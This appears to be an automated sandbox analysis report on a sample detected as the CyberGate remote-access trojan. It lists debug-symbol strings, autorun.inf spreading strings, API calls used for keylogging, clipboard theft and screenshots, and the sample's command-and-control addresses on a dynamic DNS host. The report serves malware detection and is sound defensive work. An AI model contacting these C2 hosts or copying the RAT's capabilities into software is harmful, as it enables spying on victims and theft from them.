            Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: ole32.pdb source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: shlwapi.pdbd source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: msasn1.pdb source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp
            Source: Binary string: shell32.pdbRr source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: advapi32.pdbO source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001C.00000003.540697482.00000000053E0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: combase.pdb source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: Kernel.Appcore.pdbF source: WerFault.exe, 0000001C.00000003.540697482.00000000053E0000.00000004.00000040.sdmp
            Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000001C.00000003.530725448.00000000031F7000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.552560599.0000000000B94000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.564345998.0000000003273000.00000004.00000001.sdmp
            Source: Binary string: wimm32.pdbY source: WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wsock32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wininet.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: comctl32.pdb`? source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: powrprof.pdb.rQ source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: wwin32u.pdbU source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: twinapi.appcore.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wsock32.pdb; source: WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: msacm32.pdbF? source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: cfgmgr32.pdbLrs source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: iphlpapi.pdbC source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: shlwapi.pdb^r source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: rasman.pdb@r source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: shcore.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: ws2_32.pdbx? source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: explorer.pdb source: WerFault.exe, 0000001F.00000003.555588364.00000000056E0000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.572284230.0000000005060000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587851693.0000000003400000.00000004.00000040.sdmp
            Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001C.00000003.540697482.00000000053E0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: powrprof.pdbA source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: shell32.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: gdiplus.pdbL? source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: msvcp_win.pdbm source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: cryptsp.pdbr? source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001C.00000003.540697482.00000000053E0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: userenv.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: SettingSyncCore.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: TextInputFramework.pdbd source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wimm32.pdbpr7 source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: comctl32.pdb source: WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: gdiplus.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: RmClient.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: rtutils.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: profapi.pdbfr source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: msvcp_win.pdb*Rp source: WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000001C.00000003.530712712.00000000031F1000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.552533833.0000000000B8E000.00000004.00000001.sdmp
            Source: Binary string: profapi.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001C.00000003.540697482.00000000053E0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wsock32.pdbP?}& source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: msvfw32.pdbS source: WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: sechost.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: msasn1.pdbk source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp
            Source: Binary string: msctf.pdbM source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: rasman.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: fltLib.pdbi source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: propsys.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wuser32.pdbJr} source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: msctf.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.358325341.0000000007AA0000.00000002.00000001.sdmp
            Source: Binary string: twinapi.pdb source: WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: WINMMBASE.pdbY source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001C.00000003.540697482.00000000053E0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: avicap32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000001C.00000003.530737964.00000000031FD000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.552584359.0000000000B9A000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.566720629.0000000003279000.00000004.00000001.sdmp
            Source: Binary string: iphlpapi.pdb! source: WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: WinTypes.pdb} source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: combase.pdbk source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp
            Source: Binary string: wtsapi32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: wsock32.pdbw source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: comctl32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: pstorec.pdbTr source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: RmClient.pdbS source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: crypt32.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp
            Source: explorer.exeBinary or memory string: autorun.inf
            Source: explorer.exeBinary or memory string: [autorun] ;open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\
            Source: explorer.exeBinary or memory string: [autorun];open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\
            Source: explorer.exe, 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmpBinary or memory string: [autorun]
            Source: explorer.exe, 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmpBinary or memory string: H[autorun]
            Source: explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmpBinary or memory string: [autorun]
            Source: explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmpBinary or memory string: H[autorun]
            Source: explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmpBinary or memory string: autorun.inf
            Source: explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmpBinary or memory string: [autorun]
            Source: explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmpBinary or memory string: H[autorun]
            Source: explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmpBinary or memory string: autorun.inf
            Source: explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmpBinary or memory string: [autorun]
            Source: explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmpBinary or memory string: H[autorun]
            Source: explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmpBinary or memory string: autorun.inf
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00405D04 FindFirstFileA,FindClose,1_2_00405D04
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 4_2_00405D04 FindFirstFileA,FindClose,4_2_00405D04
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 5_2_00405D04 FindFirstFileA,FindClose,5_2_00405D04
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 9_2_00405D04 FindFirstFileA,FindClose,9_2_00405D04
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_24016C78 FindFirstFileA,FindClose,20_2_24016C78
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_240145F0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,20_2_240145F0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_2403D390 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,20_2_2403D390
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_240163E8 FindFirstFileA,GetLastError,20_2_240163E8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_24016C77 FindFirstFileA,FindClose,20_2_24016C77
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_24015FE2 FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA,20_2_24015FE2
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_24015FE4 FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA,20_2_24015FE4
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_240409E4 FindFirstFileA,FindNextFileA,FindClose,20_2_240409E4
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_2404092C GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,20_2_2404092C

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: eduzao.ddns.net:7000
            Source: Malware configuration extractorURLs: eduzao.ddns.net:2020
            Source: Malware configuration extractorURLs: eduzao.ddns.net:2200
            Source: Malware configuration extractorURLs: eduzao.ddns.net:4400
            Uses dynamic DNS servicesShow sources
            Source: unknownDNS query: name: eduzao.ddns.net
            Source: unknownDNS traffic detected: queries for: eduzao.ddns.net
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000002.00000002.610418959.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Contains functionality to register a low level keyboard hookShow sources
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_0040BBF4 SetWindowsHookExA 0000000D,Function_0000B0B8,00400000,000000001_2_0040BBF4
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_2403CDE0 OpenClipboard,GetClipboardData,DragQueryFile,DragQueryFile,CloseClipboard,20_2_2403CDE0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_2403CDE0 OpenClipboard,GetClipboardData,DragQueryFile,DragQueryFile,CloseClipboard,20_2_2403CDE0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_24037464 GetDesktopWindow,GetDC,CreateCompatibleDC,GetClientRect,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,20_2_24037464
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_0040B0B8 GetKeyboardState,ToAscii,1_2_0040B0B8
            Source: dqH3t8JU1x.exe, 00000001.00000002.529914221.000000000073A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_2405038C GetAsyncKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,20_2_2405038C
            Source: Yara matchFile source: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.629145832.000000002406B000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.630397058.000000002406B000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.629304269.00000000240DB000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2200, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5908, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1768, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4908, type: MEMORY
            Source: Yara matchFile source: 20.2.explorer.exe.24010000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.2.explorer.exe.24010000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.explorer.exe.24080000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.explorer.exe.24010000.3.unpack, type: UNPACKEDPE

            E-Banking Fraud:

            barindex
            Yara detected CyberGate RATShow sources
            Source: Yara matchFile source: 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, type: MEMORY
